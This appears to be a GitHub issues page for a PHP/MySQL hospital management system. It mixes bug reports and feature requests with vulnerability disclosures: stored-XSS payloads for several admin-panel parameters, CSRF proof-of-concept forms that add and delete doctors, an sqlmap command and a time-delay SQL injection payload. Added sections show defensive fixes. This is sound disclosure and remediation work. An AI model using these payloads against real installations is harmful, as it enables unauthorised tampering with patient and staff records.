kishan0725 / hospital-management-system
Hospital Management System using php and mysql
I have tried to log in using the provided admin login credentials but I am getting an error stating wrong username or password. Kindly assist.
The registration process permits registration of patients with the same identity, i.e. names, email and phone number.
A lot of pages use hardcoded values for the MySQL connection.
Persistent cross-site scripting (XSS) in Hospital Management System v4.0 targeted towards the web admin through /admin-panel1.php via the parameter demail.
Add the Doctor info payload to Doctor Name on the Add Doctor page to target /admin-panel1.php, then use Burp Suite to get the request data and change the 'demail' parameter to the XSS payload: <sCrIpT>alert(5555)</ScRiPt>
Proof of concept (PoC)
<sCrIpT>alert(5555)</ScRiPt>
Please contact me to resolve this issue. I am not going to publish the exploit code here.
Hi,
There is a site-wide CSRF vulnerability in every functionality.
Add Doctor
<html>
<body>
<form action="http://49f9541dc2b3.ngrok.io/admin-panel1.php" method="POST">
<input type="hidden" name="doctor" value="test" />
<input type="hidden" name="special" value="Cardiologist" />
<input type="hidden" name="demail" value="test@gmail.com" />
<input type="hidden" name="dpassword" value="testtest" />
<input type="hidden" name="cdpassword" value="testtest" />
<input type="hidden" name="docFees" value="123" />
<input type="hidden" name="docsub" value="Add Doctor" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Delete Doctor
<html>
<body>
<form action="http://localhost/admin-panel1.php" method="POST">
<input type="hidden" name="demail" value="testbydhakalananda@gmail.com" />
<input type="hidden" name="docsub1" value="Delete Doctor" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
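One way to close the site-wide CSRF hole described above is a per-session synchronizer token checked on every state-changing POST. This is an added example, not the repository's code; the helper names `csrf_token` and `csrf_check` are hypothetical, and the form fields mirror the Add Doctor request shown in the report.

```php
<?php
// Added example (not from the repository): synchronizer-token CSRF protection
// for the admin-panel1.php "Add Doctor" / "Delete Doctor" forms.
// Cookie flags limit cross-site sending of the session cookie (PHP 7.3+ array form).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true, 'secure' => true]);
session_start();

// Issue one random token per session and embed it in every state-changing form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject any POST whose token is missing, malformed or does not match.
// hash_equals() compares in constant time to avoid leaking the token byte by byte.
function csrf_check(array $post): bool
{
    if (!isset($_SESSION['csrf_token']) || !isset($post['csrf_token']) || !is_string($post['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $post['csrf_token']);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST)) {
        // A forged cross-site form (as in the PoC above) carries no valid token and stops here.
        http_response_code(403);
        exit('Invalid or missing CSRF token.');
    }
    // ... existing Add Doctor / Delete Doctor handling continues here ...
}
?>
<form action="admin-panel1.php" method="POST">
    <input type="hidden" name="csrf_token"
           value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
    <input type="text" name="doctor">
    <input type="text" name="special">
    <input type="email" name="demail">
    <input type="submit" name="docsub" value="Add Doctor">
</form>
```

The same hidden field and `csrf_check()` call belong in every other form on the site, since the report notes the issue affects every functionality.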
Add the Doctor info payload to Doctor Special on the Add Doctor page to target /admin-panel1.php, then use Burp Suite to get the request data and change the 'special' parameter to the XSS payload: <script>alert(123)</script>
Steps to exploit:
Proof of concept (PoC):
<script>alert(123)</script>
Hi there,
I couldn't find a SECURITY.md in your repository and am not sure how to best contact you privately to disclose a security issue.
Can you add a SECURITY.md file with an e-mail to your repository, so that our system can send you the vulnerability details? GitHub suggests that a security policy is the best way to make sure security issues are responsibly disclosed.
Once you've done that, you should receive an e-mail within the next hour with more info.
Thanks! (cc @huntr-helper)
Appointment not created
Appointment status in doctor panel should change from "active" to "completed" either after the prescription is given or after the bill is paid by the patient.
The completed appointment should be removed from the doctor panel after the bill is paid.
When we register a new patient and are redirected to the admin panel, we can't book appointments.
Add the Doctor info payload to Doctor Name on the Add Doctor page to target /admin-panel1.php, then use Burp Suite to get the request data and change the 'dpassword' parameter to the XSS payload: <sCrIpT>alert(7777)</ScRiPt>
Steps to exploit:
Navigate to http://hospital.com/admin-panel1.php
Click 'Add Doctors', use Burp Suite to insert the XSS payload in the "dpassword" parameter
Click "Add Doctors"
Proof of concept (PoC):
<sCrIpT>alert(7777)</ScRiPt>
When a doctor prescribes for a new patient, the patient's name, ID and appointment ID are not shown in the prescription list. It seems there is some bug in this application.
Please help me.
Add the Doctor info payload to Doctor Name on the Add Doctor page to target /admin-panel1.php, then use Burp Suite to get the request data and change the 'doctor' parameter to the XSS payload: <sCrIpT>alert(1234)</ScRiPt>
I found an SQL injection in your project.
Please follow these steps to reproduce:
1: In the admin panel, use the search doctor feature:
2: Create a request to 'doctorsearch.php':
3: Save this request to test.txt file:
4: Run SQLMap for the attack:
sqlmap -r test.txt -p doctor_contact
-> Injected
5: Area of concern in doctorsearch.php (line 11 -> line 17)
Multiple SQL injections and an XSS vulnerability in Hospital-Management-System v4
A summary table of the discovered vulnerabilities:
To reproduce the XSS vulnerability, a <script>alert(1)</script> would work. And for the SQL injections, time-delay payloads work (such as '+(select*from(select(sleep(20)))a)+')
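The two SQL injection reports above (the `doctor_contact` parameter of doctorsearch.php and the other injection points) and the stored XSS reports share one root cause each: user input spliced into SQL text, and stored values echoed unescaped. This added example, which is not the project's own code, shows the doctor lookup rewritten with a bound parameter and escaped on output; the table and column names, the environment variable names and the `search_doctor`/`h` helpers are assumptions.

```php
<?php
// Added example (not the project's code): doctor search with a prepared statement
// and HTML-escaped output. Table/column names are assumed, not the project's.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw instead of silently failing

function search_doctor(mysqli $db, string $contact): array
{
    // The '?' placeholder keeps the user-controlled value out of the query text, so a
    // time-delay payload such as '+(select*from(select(sleep(20)))a)+' is just a
    // string compared against doctor_contact and never executed as SQL.
    $stmt = $db->prepare('SELECT doctor, special, demail FROM doctors WHERE doctor_contact = ?');
    $stmt->bind_param('s', $contact);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Escape at the point of output so a stored doctor name like
// <script>alert(1)</script> is rendered as text, not executed.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Connection settings come from the environment instead of being hardcoded in each page
// (one of the other issues above). Variable names here are assumptions.
$db = new mysqli(
    getenv('DB_HOST') ?: 'localhost',
    getenv('DB_USER') ?: '',
    getenv('DB_PASS') ?: '',
    getenv('DB_NAME') ?: 'hospital'
);
$db->set_charset('utf8mb4');

$contact = $_POST['doctor_contact'] ?? '';
foreach (search_doctor($db, $contact) as $row) {
    echo '<tr><td>' . h($row['doctor']) . '</td><td>' . h($row['special'])
       . '</td><td>' . h($row['demail']) . '</td></tr>' . PHP_EOL;
}
```

Every other query on the page that concatenates `$_GET`/`$_POST` values (the admin-panel1.php add/delete handlers included) needs the same bind_param treatment; escaping alone does not fix the injection, and binding alone does not fix the XSS.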
Hello @kishan0725
Can I contribute to this project by adding new features to the current project, like:
Adding a medicine buying module
Adding a payment module
Creating a web interface for the same
Would it be fine if I work on it?
Add Docker support